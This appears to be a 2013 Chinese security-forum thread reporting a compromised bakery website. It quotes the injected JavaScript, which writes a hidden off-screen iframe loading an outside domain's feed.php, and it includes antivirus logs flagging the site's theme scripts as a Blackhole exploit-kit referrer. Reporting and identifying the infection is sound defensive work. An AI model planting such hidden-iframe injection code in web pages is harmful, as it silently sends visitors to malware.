http://www.thepixiecakefactory.com/

显示全部楼层 · 发表于 2013-9-20 10:16:34

function gra(a, b) {
return Math.floor(Math.random() * (b - a + 1)) + a;
}
function rs() {
return Math.random().toString(36).substring(5);
}
if (navigator.cookieEnabled && document.cookie.indexOf('testcookie1=') == -1) {
var stnm = rs();
document.write('<style>.s' + stnm + ' { position:absolute; left:-' + gra(600, 1000) + 'px; top:-' + gra(600, 1000) + 'px; }</style> <div class="s' + stnm + '"><iframe src="http://firingwaterway.org/ad/feed.php" width="' + gra(300, 600) + '" height="' + gra(300, 600) + '"></iframe></div>');
var exp = new Date();
exp.setDate(exp.getDate() + 7);
document.cookie = 'testcookie1=' + rs() + '; expires=' + exp.toGMTString();
}

复制代码

Avira

2013/9/20 上午 10:09 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\UL724GWW\jquery.tipsy[1].js'
   包含病毒或有害的程式 'JS/BlacoleRef.CM' [virus]
   已採取動作：
   檔案會移動至 '541d0c78.qua' 名稱底下的隔離區目錄。.

2013/9/20 上午 10:09 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\R8AOCKPW\jquery.tweet[1].js'
   包含病毒或有害的程式 'JS/BlacoleRef.CM' [virus]
   已採取動作：
   檔案會移動至 '4c8a23df.qua' 名稱底下的隔離區目錄。.

2013/9/20 上午 10:09 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描。]。
   檔案數： 766
   目錄數： 0
   惡意程式碼數： 2
   警告數： 0

2013/9/20 上午 10:08 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\UL724GWW\PT_Sans_400-PT_Sans_700.font[1].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.CM [virus]'
   執行的動作：傳輸至掃描程式

2013/9/20 上午 10:08 [Web Protection] 發現惡意程式碼
   從 URL
   "http://www.thepixiecakefactory.com/wp-content/themes/studiozen/js/font/PT_Sans_
   400-PT_Sans_700.font.js?ver=3.6.1" 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.CM' [virus]。
   已採取動作：已略過

2013/9/20 上午 10:08 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\TIHYMAU3\cufon-yui[2].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.CM [virus]'
   執行的動作：傳輸至掃描程式

2013/9/20 上午 10:08 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\R8AOCKPW\common[2].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.CM [virus]'
   執行的動作：傳輸至掃描程式

2013/9/20 上午 10:08 [Web Protection] 發現惡意程式碼
   從 URL
   "http://www.thepixiecakefactory.com/wp-content/themes/studiozen/js/common.js"
   存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.CM' [virus]。
   已採取動作：已略過

2013/9/20 上午 10:08 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\MDC6X2XG\fontconfig[1].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.CM [virus]'
   執行的動作：傳輸至掃描程式

2013/9/20 上午 10:08 [Web Protection] 發現惡意程式碼
   從 URL
   "http://www.thepixiecakefactory.com/wp-content/themes/studiozen/js/cufon-yui.js"
   存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.CM' [virus]。
   已採取動作：已略過

2013/9/20 上午 10:08 [Web Protection] 發現惡意程式碼
   從 URL
   "http://www.thepixiecakefactory.com/wp-content/themes/studiozen/js/fontconfig.js
   " 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.CM' [virus]。
   已採取動作：已略過

2013/9/20 上午 10:08 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\GP9UHU8J\jquery[3].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.CM [virus]'
   執行的動作：傳輸至掃描程式

2013/9/20 上午 10:08 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\R8AOCKPW\jquery.tweet[1].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.CM [virus]'
   執行的動作：拒絕存取

2013/9/20 上午 10:08 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\UL724GWW\jquery.tipsy[1].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.CM [virus]'
   執行的動作：拒絕存取

2013/9/20 上午 10:08 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\VUGD722P\preloader[1].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.CM [virus]'
   執行的動作：傳輸至掃描程式

2013/9/20 上午 10:08 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\5TH1K21Z\jquery.nivo.slider.pack[1].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.CM [virus]'
   執行的動作：傳輸至掃描程式

2013/9/20 上午 10:08 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\GP9UHU8J\jquery[3].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.CM [virus]'
   執行的動作：拒絕存取

2013/9/20 上午 10:08 [Web Protection] 發現惡意程式碼
   從 URL
   "http://www.thepixiecakefactory.com/wp-content/themes/studiozen/js/jquery.js"
   存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.CM' [virus]。
   已採取動作：已略過

2013/9/20 上午 10:08 [Web Protection] 發現惡意程式碼
   從 URL
   "http://www.thepixiecakefactory.com/wp-content/themes/studiozen/js/preloader.js"
   存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.CM' [virus]。
   已採取動作：已略過

2013/9/20 上午 10:08 [Web Protection] 發現惡意程式碼
   從 URL
   "http://www.thepixiecakefactory.com/wp-content/themes/studiozen/js/jquery.easing
   .min.js" 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.CM' [virus]。
   已採取動作：封鎖的檔案

2013/9/20 上午 10:08 [Web Protection] 發現惡意程式碼
   從 URL
   "http://www.thepixiecakefactory.com/wp-content/themes/studiozen/js/jquery.pretty
   Photo.js" 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.CM' [virus]。
   已採取動作：封鎖的檔案

2013/9/20 上午 10:08 [Web Protection] 發現惡意程式碼
   從 URL
   "http://www.thepixiecakefactory.com/wp-content/themes/studiozen/js/nivo/jquery.n
   ivo.slider.pack.js" 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.CM' [virus]。
   已採取動作：已略過

2013/9/20 上午 10:08 [Web Protection] 發現惡意程式碼
   從 URL
   "http://www.thepixiecakefactory.com/wp-content/themes/studiozen/js/html5player/j
   query.jplayer.min.js" 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.CM' [virus]。
   已採取動作：封鎖的檔案

2013/9/20 上午 10:08 [Web Protection] 發現惡意程式碼
   從 URL
   "http://www.thepixiecakefactory.com/wp-content/themes/studiozen/js/menu/superfis
   h.js" 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.CM' [virus]。
   已採取動作：封鎖的檔案

2013/9/20 上午 10:08 [Web Protection] 發現惡意程式碼
   從 URL
   "http://www.thepixiecakefactory.com/wp-content/themes/studiozen/js/jquery.tools.
   tabs.min.js" 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.CM' [virus]。
   已採取動作：封鎖的檔案

2013/9/20 上午 10:08 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\R8AOCKPW\jquery.tweet[1].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.CM [virus]'
   執行的動作：傳輸至掃描程式

2013/9/20 上午 10:08 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\UL724GWW\jquery.tipsy[1].js 中
   偵測到病毒或有害的程式 'JS/BlacoleRef.CM [virus]'
   執行的動作：傳輸至掃描程式

2013/9/20 上午 10:08 [Web Protection] 發現惡意程式碼
   從 URL
   "http://www.thepixiecakefactory.com/wp-content/themes/studiozen/js/jquery.tipsy.
   js" 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.CM' [virus]。
   已採取動作：已略過

2013/9/20 上午 10:08 [Web Protection] 發現惡意程式碼
   從 URL
   "http://www.thepixiecakefactory.com/wp-content/themes/studiozen/js/jquery.tweet.
   js" 存取資料時，
   發現病毒或有害的程式 'JS/BlacoleRef.CM' [virus]。
   已採取動作：已略過

显示全部楼层 · 发表于 2013-9-20 13:21:44

类别: 特洛伊木马

描述: 这个程序很危险，而且执行来自攻击者的命令。

推荐的操作: 立即删除这个软件。

项目:
file:C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5MLZ2NLL\featured-blocks[1].js
file:C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5MLZ2NLL\fontconfig[1].js
file:C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5MLZ2NLL\jquery.tipsy[1].js
file:C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5MLZ2NLL\jquery.tweet[1].js
file:C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5MLZ2NLL\PT_Sans_400-PT_Sans_700.font[1].js
file:C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5MLZ2NLL\supersized.3.2.1.min[1].js
file:C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5MLZ2NLL\supersized.shutter[1].js
file:C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8DOAYD7Q\galleria-1.2.5.min[1].js
file:C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8DOAYD7Q\jquery.backstretch.min[1].js
file:C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8DOAYD7Q\jquery.easing.min[1].js
file:C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8DOAYD7Q\jquery.nivo.slider.pack[1].js
file:C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8DOAYD7Q\jquery.prettyPhoto[1].js
file:C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8DOAYD7Q\preloader[1].js
file:C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DK1AXNSL\common[1].js
file:C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DK1AXNSL\cufon-yui[1].js
file:C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DK1AXNSL\jquery.jplayer.min[1].js
file:C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DK1AXNSL\jquery.tools.tabs.min[1].js
file:C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DK1AXNSL\jquery[1].js
file:C:\Users\S\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DK1AXNSL\superfish[1].js

联机获取此项的详细信息。

[已鉴定] http://www.thepixiecakefactory.com/